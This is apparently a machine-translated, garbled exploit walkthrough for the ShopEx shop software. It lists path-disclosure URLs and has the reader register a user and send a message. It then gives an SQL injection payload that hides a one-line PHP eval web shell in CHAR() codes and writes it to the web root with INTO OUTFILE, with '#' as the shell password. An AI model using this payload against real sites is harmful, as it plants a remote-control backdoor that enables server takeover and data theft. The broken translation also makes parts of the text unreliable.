Usage:
First, find the absolute path of the target website.
Http://www.wooyun.in/install/svinfo.php? Phpinfo = true
Http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_ B2B _2_0_cat.php
Http://www.bkjia.com/core/api/site/2.0/api_ B2B _2_0_goodstype.php http://www.wooyun.in/core/api/site/2.0/api_ B2B _2_0_brand.php shopex there are many explosive path vulnerabilities, Please study on your own. The second: register a common user http://www.wooyun.in /? Passport-signup.html 3: Send messages
Http://www.wooyun.in /? Member-send.html
Code
Wooyun. in 'Union select CHAR (60, 63,112,104,112, 32, 64,101,118, 97,108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'e:/zkeysoft/www/x. php '#
The password in one sentence is #
This vulnerability requires mysql user permissions, writable export directories, and server environments.
Shell Diagram
Address: http://www.wooyun.in/post/shopexgetshell.html